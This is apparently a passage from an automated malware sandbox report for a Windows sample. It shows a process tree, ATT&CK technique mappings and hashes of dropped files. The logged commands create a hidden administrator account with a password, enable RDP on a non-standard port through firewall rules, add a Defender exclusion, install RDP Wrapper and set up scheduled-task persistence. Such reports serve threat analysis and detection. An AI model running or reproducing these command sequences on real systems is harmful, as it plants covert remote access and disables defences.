        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\FyO.dll" /tn vjgt
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1768
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Local\Temp\nPFD.vbs" trtqiatOMC WvLGQhWjGC "C:\Users\Admin\AppData\Local\Temp\Xdhce.vbs" "{5EDC0164-CAB7-4D37-B2BD-11F83173987F}" "C:\Users\Admin\AppData\Local\Temp\FyO.dll"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1048
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Local\Temp\nPFD.vbs" trtqiatOMC WvLGQhWjGC "C:\Users\Admin\AppData\Local\Temp\Xdhce.vbs" "{5EDC0164-CAB7-4D37-B2BD-11F83173987F}" "C:\Users\Admin\AppData\Local\Temp\FyO.dll"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:480
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\FyO.dll" /tn PuJt
      4⤵
      System Location Discovery: System Language Discovery
      PID:2040
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\FyO.dll" /tn PuJt
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2124
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\cUiAacjYbc.bat trtqiatOMC WvLGQhWjGC"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2344
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1488
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:656
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:348
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1928
    - - C:\Windows\SysWOW64\net.exe
        
        net user trtqiatOMC WvLGQhWjGC /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1556
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user trtqiatOMC WvLGQhWjGC /add
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:404
    - - C:\Windows\SysWOW64\net.exe
        
        net localgroup Administrators trtqiatOMC /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3048
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators trtqiatOMC /add
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3040
    - - C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" trtqiatOMC /add
        5⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:1084
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" trtqiatOMC /add
        6⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:1348
    - - C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1096
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:932
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v trtqiatOMC /t REG_DWORD /d "00000000" /f
        5⤵
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        
        PID:1560
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1356
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:1792
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2076
    - - C:\Windows\SysWOW64\timeout.exe
        
        Timeout /t 15
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2480
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\autoupdate.bat"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1280
    - - C:\Windows\SysWOW64\fsutil.exe
        
        fsutil dirty query C:
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:308
    - - C:\Windows\SysWOW64\sc.exe
        
        sc queryex "TermService"
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:888
    - - C:\Windows\SysWOW64\find.exe
        
        find "STATE"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1512
    - - C:\Windows\SysWOW64\find.exe
        
        find /v "RUNNING"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1444
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:772
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        5⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        System Location Discovery: System Language Discovery
        
        PID:2296
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2956
    - - C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1312
    - - C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1264
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c query session rdp-tcp
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2784
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        5⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1104
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2876
    - - C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        5⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:2016
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2356
    - - C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1444
    - - C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2256
    - - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2444
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2240
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1604
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:272
      - C:\Windows\SysWOW64\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:336
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "6.1.7601.17514" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1736
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"[6.1.7601.17514]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
PID:2992

C:\Windows\system32\taskeng.exe
taskeng.exe {1F07AD71-D342-467F-BE89-6AA9685D85B2} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]
1⤵
PID:2748
- C:\Windows\System32\WScript.exe
  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\sfud.vbs" trtqiatOMC WvLGQhWjGC "C:\Users\Admin\AppData\Local\Temp\Frffrabn.bat"
  2⤵
  PID:2956
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\Frffrabn.bat
    3⤵
    - Drops file in System32 directory
    PID:1324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
      4⤵
      PID:264
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        5⤵
        
        PID:2836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
      4⤵
      PID:2520
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        5⤵
        
        PID:2220
  - - C:\Windows\system32\net.exe
      net user trtqiatOMC WvLGQhWjGC /add
      4⤵
      PID:2692
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user trtqiatOMC WvLGQhWjGC /add
        5⤵
        
        PID:2996
  - - C:\Windows\system32\net.exe
      net localgroup Administrators trtqiatOMC /add
      4⤵
      PID:2908
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators trtqiatOMC /add
        5⤵
        
        PID:2928
  - - C:\Windows\system32\net.exe
      net localgroup Remote Desktop Users trtqiatOMC /add
      4⤵
      PID:2844
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Remote Desktop Users trtqiatOMC /add
        5⤵
        
        PID:2840
  - - C:\Windows\system32\net.exe
      net accounts /maxpwage:unlimited
      4⤵
      PID:1104
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        5⤵
        
        PID:2948
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v trtqiatOMC /t REG_DWORD /d "00000000" /f
      4⤵
      Hide Artifacts: Hidden Users
      PID:2036
  - - C:\Windows\system32\reg.exe
      reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
      4⤵
      PID:2072
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:2108
  - - C:\Windows\system32\timeout.exe
      Timeout /t 15
      4⤵
      Delays execution with timeout.exe
      PID:1508
- C:\Windows\System32\WScript.exe
  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\Xdhce.vbs" trtqiatOMC WvLGQhWjGC "{5EDC0164-CAB7-4D37-B2BD-11F83173987F}"
  2⤵
  PID:2652
- C:\Windows\System32\WScript.exe
  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\Xdhce.vbs" trtqiatOMC WvLGQhWjGC "{5EDC0164-CAB7-4D37-B2BD-11F83173987F}"
  2⤵
  PID:1164
- C:\Windows\System32\WScript.exe
  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\sfud.vbs" trtqiatOMC WvLGQhWjGC "C:\Users\Admin\AppData\Local\Temp\Frffrabn.bat"
  2⤵
  PID:1956
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\Frffrabn.bat
    3⤵
    - Drops file in System32 directory
    PID:2228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
      4⤵
      PID:1820
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        5⤵
        
        PID:1032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
      4⤵
      PID:2424
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        5⤵
        
        PID:2492
  - - C:\Windows\system32\net.exe
      net user trtqiatOMC WvLGQhWjGC /add
      4⤵
      PID:1040
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user trtqiatOMC WvLGQhWjGC /add
        5⤵
        
        PID:528
  - - C:\Windows\system32\net.exe
      net localgroup Administrators trtqiatOMC /add
      4⤵
      PID:1036
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators trtqiatOMC /add
        5⤵
        
        PID:1768
  - - C:\Windows\system32\net.exe
      net localgroup Remote Desktop Users trtqiatOMC /add
      4⤵
      PID:2256
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Remote Desktop Users trtqiatOMC /add
        5⤵
        
        PID:2444
  - - C:\Windows\system32\net.exe
      net accounts /maxpwage:unlimited
      4⤵
      PID:1604
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        5⤵
        
        PID:2240
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v trtqiatOMC /t REG_DWORD /d "00000000" /f
      4⤵
      Hide Artifacts: Hidden Users
      PID:1904
  - - C:\Windows\system32\reg.exe
      reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
      4⤵
      PID:1372
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1756
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:372
  - - C:\Windows\system32\timeout.exe
      Timeout /t 15
      4⤵
      Delays execution with timeout.exe
      PID:2704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

Hide Artifacts

T1564

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Password Policy Discovery

T1201

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\RDP Wrapper\autoupdate.bat

Filesize
12KB

MD5
b365fde3be7855f4254d1e4bba45d260

SHA1
b56c6f0402b25c5d68e3a722144f5f4b5bb53d27

SHA256
2a175e17c98f9d5f436e23d1c9670f36e54cb82269bccddc87dcfbcfb04d1360

SHA512
d08e261c0f5c18041d005029cc6ed6119a8cc446607bb5f683a059d1a193d8e04d3e0b52c9f2ea871fcfa8e043c5c2886cfce5419eaf37c39003236f7a399026

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\BkHZX.com

Filesize
112KB

MD5
a5d8717cba5777995ffd023b73a051e4

SHA1
1bbe2cf40a46f40b9772033bc9a802d0028a9094

SHA256
33b05d86169ce170e891b2bf79384efc92c12f212d81ee2b4af4d86a83f42395

SHA512
3d113aa2781915dbcffe40ffa09d96bf6d7111b2b8e767deac7243dd015d1da060663504a6481590e3302168f4fd1f0c63cefa51bd1c63da682db32dc4b6462e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\EgOSu.com

Filesize
1.9MB

MD5
b92b3cd722985f21af5e780ddaf8ec9f

SHA1
41fa6e293af5a90889716dac883f57e5dc34daba

SHA256
5585b1eedd3110391303f0cf3936f247386b1e688452cbd4f403abcb504adcbd

SHA512
eb057608e1daf916833b76dac08b0afa5572c7678f66afabf8caa35bbd688c0cf45a047d364536b343e384c3462a958f7a0b083c1fab63965076db55e9abdfb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\grom

Filesize
455KB

MD5
58a110bcbec45ff600f9bc0d7e98471f

SHA1
c8514f0be76aec9a3fd0108ba7a672cb6db56b05

SHA256
94bf83acfe6d997b12caffa86c59278f5b4765735047b836016ec2073fd5a196

SHA512
c24ce1f5a479e3c57899a4a35a0eaf1df33023de28a6d36435187a1b34078cddac8bddf8ab07ced5de02a72462ec9b984d22aab9f2731cebda6bad875794d9cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\hyr

Filesize
439KB

MD5
5c0c0dee805dfce8baa8cc55b1283052

SHA1
a51faaa602d8581831b890b0f37f668d28a0eb1c

SHA256
809e04ceb93c59c55c1905bcb1af8c1bbf8ccd991696228d551b1ab131c97fb0

SHA512
de9e6964bc88f741758762da3ede034a0cba66711d0f615051e0ed4599ed02e303148cde60c6071234665e59b8b6b6b223bad019f688442ee8455aa424b22cd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\kij

Filesize
565KB

MD5
8338b1fc8a15e649fe9867d0bc7cecd2

SHA1
1fedd0a100549c0ba9940a1c2ac5c1ddb3cfa5eb

SHA256
10105dabb0273dc7fbd6c167178bf357906799dcec9575694c2bd182c36a853e

SHA512
2f6a0f0479206ad34a3f73c3273312090f04dba8e32fb6de1b534e8ee2405cbf1218df9e25d741b21ce6625f7513245799d37e78d4d50eb859c24b457ea17cd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\oxlwi.com

Filesize
393KB

MD5
c30c9064c4a069bb7d541c1e0af39f09

SHA1
6bb38b4f16bfe4aa2df5403a089d9bae588a573c

SHA256
ef89574c3f80dadd4568b34c9fa1b7bad12d0f84dc1fb711fcc5fcea3358a80c

SHA512
b06fa26d7cf6d774ee14897b81aec72ceaff6355db41086351ecd7f65bd0d3b9817984f7177cfb9f06b2c07083e470ccf4a3027f90d443556e699311a738db6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rusk.com

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\sfera.com

Filesize
604KB

MD5
4517e5b8c4bd8902c3d6a9b9e654ae61

SHA1
feebcecb0b44144051df388755df2a58c5c79690

SHA256
15fab1634ae1cef6e6acd45553c6c11da455c8850ceebe08cb134473b260948e

SHA512
8cdeed1f9cefb0f047ff63217ae3de48d028066f88574f8168e35f1c0080524a061dff5fd85414fea27ffd68dfa24e2557c68552a6fe9b6b96dfd9d47e4fe6c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\utru.com

Filesize
626KB

MD5
b9314534cee284ef03329d7c4d899e72

SHA1
15583a208381887431e4958086718bd14a5c294b

SHA256
1f6ac542b5fcc85b43cd0ca42af65608c8767e05cebe1543d9359ed73a4b93cf

SHA512
92ad8eda697da85103663f6100bc04b167bb9ad3908ed654ab48ae3876efa328716df18a28e1e904566ce59c588a1891cb3f7b4ce272fca5352d0e4e06a8d0e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\vobo.com

Filesize
777KB

MD5
cdb9ce9e2256e661a398d1d5bb76273e

SHA1
886719e3c6de7d8fc9a004c8ee5cad23d6e024b0

SHA256
5838a870c965da74c91c5990020dc64ec51fa03cd41fc8dd869d006520b9b3c9

SHA512
5c132785825a2ac2aa9cda7f61e20c5159ee31cc3c066910c433db99be3cb35e08a79134e4866d80950ebf947c74cfd920524634583b0cb8005d36d5aacc48ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab2510.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Frffrabn.bat

Filesize
1KB

MD5
9c20939cef9cd0e6f80bfe754ae2c8ae

SHA1
fc0f35ed71d48a924b4a6b685ad12dc04a817640

SHA256
cbb1d33adddefa4e11f5e87680573289229893a7510bc58059443703e9997a1a

SHA512
a44a474c553700f0eaae5aff0d8efd41d64f131a843ddc75de3fd38480d6612896e5f5cc431613b1d50b9b6b980b7a58f00659910684cb17816c108412b6eb79

Download Submit
C:\Users\Admin\AppData\Local\Temp\FyO.dll

Filesize
933B

MD5
e62ff4607e072e3885c24b36f511ce98

SHA1
3aaa0207fca303b6ed1ae506b1c6a4f876757f19

SHA256
4abb713571766bce793ef1cfe0e2ebde44f8518cdf559a01134bf7d62443355b

SHA512
f0faf0cbc1044d5f716b34f81882df27e84b907da127ac6aa7ba570ba2f31f3bf1bbd241267302a6dcf167c3a413eb64c5226dd46aa0620196f886da9f43b886

Download Submit
C:\Users\Admin\AppData\Local\Temp\FyO.dll

Filesize
926B

MD5
1144f8773abdf32a9e92f78d29ae390f

SHA1
8b54ab9be99a9df5afa3a2c02d0022fc7785e91e

SHA256
57002ebca59f65f50e7237b594ec645f9ad2fb15053cc9da2111e7d474355a72

SHA512
67a3fc886453524fbcb443ea4c6069d344bf770250d66656e92786ca4621f33106926fe6f181dcf0c409bb0f5048dc1f8718019ae393b09df0d5bd0cccb49253

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2532.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Xdhce.vbs

Filesize
4KB

MD5
52cab7d0956dde8857cad982d0ee203c

SHA1
8467f9c1ca03ffe724d09275251e478d09ff4457

SHA256
dc7723a782bab621f18684b9654eabd859a13d9812a93813d9a15be97e673f9d

SHA512
b14e9e05ae06c7173fea2eb581cb041b3af21214986d36910a55e0c5545069ffa7310c47e13e50537796fcf7064d1d81e12fb248e09ba494f217172466171fdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\nPFD.vbs

Filesize
2KB

MD5
193242114c1738d0ea04aa93659fdd5a

SHA1
a929cc1cfbe44ba8a99117dfd7819776ab45d465

SHA256
c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928

SHA512
46825c3cc42c3c2e86a3890b29b3a2cf9b30e892d0d38bfb2e3334ffa3951b8f732b2786bdffa528ee6ff05c789c35e963f069d54680c3e16735165072e6fec4

Download Submit
C:\Users\Admin\AppData\Local\Temp\sfud.vbs

Filesize
2KB

MD5
e2412243518e6670139e6a1ab6f86a11

SHA1
b5b55e61279bfea17414d17af75dd6800ffb97c6

SHA256
ddf634c6f7197af3255caf94af3c986ed7348e7efd508274075cb36254fc8762

SHA512
3d0289054ea2355d923da7f6cda0f52015808d73c73910a7145efff80636788dc99c12382ed5f6d25dc299a5be0222deed46a8018c83c6c2852072e4af6e62c6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WN9BAHK8VNA543PW9Z96.temp

Filesize
7KB

MD5
0f527218fa522ac1e823975312f7627f

SHA1
6c904a20bf6a9d605f6747f755eab79168df5772

SHA256
e15ee708002170b5b35256693dbaffcb1aab66fef685e27554ec202a183345f4

SHA512
50e5ffc6e56437609690f26eb0b3e2c7dc741d24f089eba198eb28a8b7cf835a1cd1f075f2230cc68569bd90743b318c1d16849436b5f1841bb5ce68a1c42908

Download Submit
C:\Users\Admin\AppData\Roaming\cUiAacjYbc.bat

Filesize
1KB

MD5
fd5bdb9de205580a5b1cbbee5a115c93

SHA1
aca041af337daea9a28292a0bc47ddf65de924a0

SHA256
0ba027251fdc179b19f9dafb9514da691256f22468764d33c6c275e3e2f8580f

SHA512
